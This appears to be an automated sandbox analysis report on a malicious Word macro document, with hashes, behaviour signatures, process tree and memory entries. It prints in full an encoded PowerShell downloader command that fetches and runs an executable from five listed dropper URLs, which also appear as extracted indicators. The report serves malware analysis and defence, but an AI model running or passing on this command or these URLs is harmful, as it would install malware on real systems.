Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    10-05-2024 05:03

General

  • Target

    2d7c312bef0b0e104235257b65a4a798_JaffaCakes118.doc

  • Size

    173KB

  • MD5

    2d7c312bef0b0e104235257b65a4a798

  • SHA1

    9d6e439db2eb8136445322feb876b64f1a518194

  • SHA256

    0ad5cd94afa0720d0b2745a38780cbb3576dab358a2d754a11fcabd861e9feb3

  • SHA512

    f41d86b985445c190e97401d38fd8243de7e89ed8fc84b58f2e4f3375856f1f61382999afc50ff42c8edfab933ba72a6283e44b034af05498b8405462cb68957

  • SSDEEP

    3072:g4PrXcuQuvpzm4bkiaMQgAlSpQQB0hEJ8NVtDaCppL8h8bRR:dDRv1m4bnQgISuvP8h8bRR

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://factorialk.pp.ua/wp-admin/gGQxSh/

exe.dropper

https://petskingdom.in/wp-content/APf/

exe.dropper

https://teachtoachieve.com.ng/wp-content/bse6jwy66569462/

exe.dropper

https://www.kerenport.co.il/wp-content/OwVbK/

exe.dropper

https://ssfz.cc/wp-content/qOWryJ/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2d7c312bef0b0e104235257b65a4a798_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2352
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2272
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABkAGEAaQBrAHAAbwBtAGYAaQBhAGQAZgBpAHoAbQBlAGEAdABoAD0AJwBjAGgAZQBlAHoAeQB1AHUAZgB2AGEAbwB0AG0AYQBlAGMAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBFAGMAdQByAEkAYABUAHkAYABwAHIATwB0AGAAbwBDAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAHgAbwBoACAAPQAgACcAMwAxADIAJwA7ACQAYwBoAGUAdQB6AHgAZQBpAHYAaABlAGUAZwA9ACcAbQBvAG8AegBnAGEAaQBoAGgAaQBlAHgAdABoAGkAZQBkACcAOwAkAGYAbwBpAGYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHgAbwBoACsAJwAuAGUAeABlACcAOwAkAGoAZQBlAHkAcQB1AGkAZQBiAHoAbwBhAGYAPQAnAGcAbwB0ACcAOwAkAGMAaABhAGUAcwB4AGUAZgBjAGUAaQBkAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAJwArACcAdAAnACkAIABuAGUAdAAuAFcARQBCAGMATABJAGUAbgBUADsAJAB3AHUAbQBqAGkAZQBkAHQAbwBpAG0AbgBpAHQAdwBlAGkAbAA9ACcAaAB0AHQAcAA6AC8ALwBmAGEAYwB0AG8AcgBpAGEAbABrAC4AcABwAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AZwBHAFEAeABTAGgALwAqAGgAdAB0AHAAcwA6AC8ALwBwAGUAdABzAGsAaQBuAGcAZABvAG0ALgBpAG4ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AQQBQAGYALwAqAGgAdAB0AHAAcwA6AC8ALwB0AGUAYQBjAGgAdABvAGEAYwBoAGkAZQB2AGUALgBjAG8AbQAuAG4AZwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBiAHMAZQA2AGoAdwB5ADYANgA1ADYAOQA0ADYAMgAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AawBlAHIAZQBuAHAAbwByAHQALgBjAG8ALgBpAGwALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ATwB3AFYAYgBLAC8AKgBoAHQAdABwAHMAOgAvAC8AcwBzAGYAegAuAGMAYwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBxAE8AVwByAHkASgAvACcALgAiAHMAcABgAEwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAYwB1AGEAdwB2AGkAdwA9ACcAbgB1AGEAZgBjAGgAZQBhAGMAbQBvAGUAbgBnAG8AZQB6AGcAZQB1AGsAdgBpAG8AcwAnADsAZgBvAHIAZQBhAGMAaAAoACQAcgB1AHUAawBxAHUAdQB1AGoAeQBlAG8AeAB3AGkAbwB5AGIAZQBlAGsAbgBhAG8AYwAgAGkAbgAgACQAdwB1AG0AagBpAGUAZAB0AG8AaQBtAG4AaQB0AHcAZQBpAGwAKQB7AHQAcgB5AHsAJABjAGgAYQBlAHMAeABlAGYAYwBlAGkAZAAuACIAZABvAGAAdwBuAGwAbwBBAGQARgBgAEkAYABsAEUAIgAoACQAcgB1AHUAawBxAHUAdQB1AGoAeQBlAG8AeAB3AGkAbwB5AGIAZQBlAGsAbgBhAG8AYwAsACAAJABmAG8AaQBmACkAOwAkAGwAbwBvAGgAeABpAGUAYwB0AHUAdQBnAD0AJwBiAGEAZQByAGwAZQBpAHoAcABpAG8AYwBoAHUAYQBuAGMAaABpAG8AdABoACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAJwArACcAZQBtACcAKQAgACQAZgBvAGkAZgApAC4AIgBsAGAARQBOAGcAYABUAEgAIgAgAC0AZwBlACAAMgA2ADQANwA4ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBjAHIARQBgAEEAVABFACIAKAAkAGYAbwBpAGYAKQA7ACQAawBlAGEAdgB4AGEAaQBiAGMAaQBlAGwAPQAnAGgAdQBwACcAOwBiAHIAZQBhAGsAOwAkAHgAaQBnAGMAZQBpAGMAaABnAGUAaQB3AHcAbwBpAHEAdQB0AGEAdQBwAGMAaABvAHUAcgA9ACcAZgBvAGEAaABqAGUAYQBtAHEAdQBvAHQAaABiAGUAaQBzAGsAdQBnAHAAbwBpAGgAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAaAB1AHUAagB6AGkAbwBjAGgAYwBoAGEAbwBtAHcAdQBtAGQAbwBhAGoAawBvAHAAPQAnAHkAaQBvAHAAeQBhAG8AbgBoAG8AcAB5AGUAaQB6AHYAaQBvAGIAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2488

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      209bf7d2d76c32548ebae44183db1c2f

      SHA1

      3debf738b24a4763012e472395c3ae53f11bc202

      SHA256

      3ea703711cf78766001b271ebcf2ad59d914e7d004350c0626f0fb777f6a4e53

      SHA512

      5a4645ab99a5c527ed365165ce10bfe766f5fe9b2142036b864719db3ed147a4136872f1aac3c3e339b7bfa178320f5ffc3c8af023bee2fc007cc8eadca43a9c

    • memory/2352-36-0x0000000006280000-0x0000000006380000-memory.dmp

      Filesize

      1024KB

    • memory/2352-7-0x0000000000580000-0x0000000000680000-memory.dmp

      Filesize

      1024KB

    • memory/2352-37-0x0000000006280000-0x0000000006380000-memory.dmp

      Filesize

      1024KB

    • memory/2352-64-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2352-9-0x0000000000580000-0x0000000000680000-memory.dmp

      Filesize

      1024KB

    • memory/2352-18-0x0000000006280000-0x0000000006380000-memory.dmp

      Filesize

      1024KB

    • memory/2352-27-0x0000000006280000-0x0000000006380000-memory.dmp

      Filesize

      1024KB

    • memory/2352-0-0x000000002F381000-0x000000002F382000-memory.dmp

      Filesize

      4KB

    • memory/2352-65-0x000000007165D000-0x0000000071668000-memory.dmp

      Filesize

      44KB

    • memory/2352-2-0x000000007165D000-0x0000000071668000-memory.dmp

      Filesize

      44KB

    • memory/2352-8-0x0000000000580000-0x0000000000680000-memory.dmp

      Filesize

      1024KB

    • memory/2352-45-0x000000007165D000-0x0000000071668000-memory.dmp

      Filesize

      44KB

    • memory/2352-46-0x0000000000580000-0x0000000000680000-memory.dmp

      Filesize

      1024KB

    • memory/2352-47-0x0000000006C90000-0x0000000006D90000-memory.dmp

      Filesize

      1024KB

    • memory/2352-48-0x0000000006280000-0x0000000006380000-memory.dmp

      Filesize

      1024KB

    • memory/2352-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2488-44-0x0000000002960000-0x0000000002968000-memory.dmp

      Filesize

      32KB

    • memory/2488-43-0x000000001B740000-0x000000001BA22000-memory.dmp

      Filesize

      2.9MB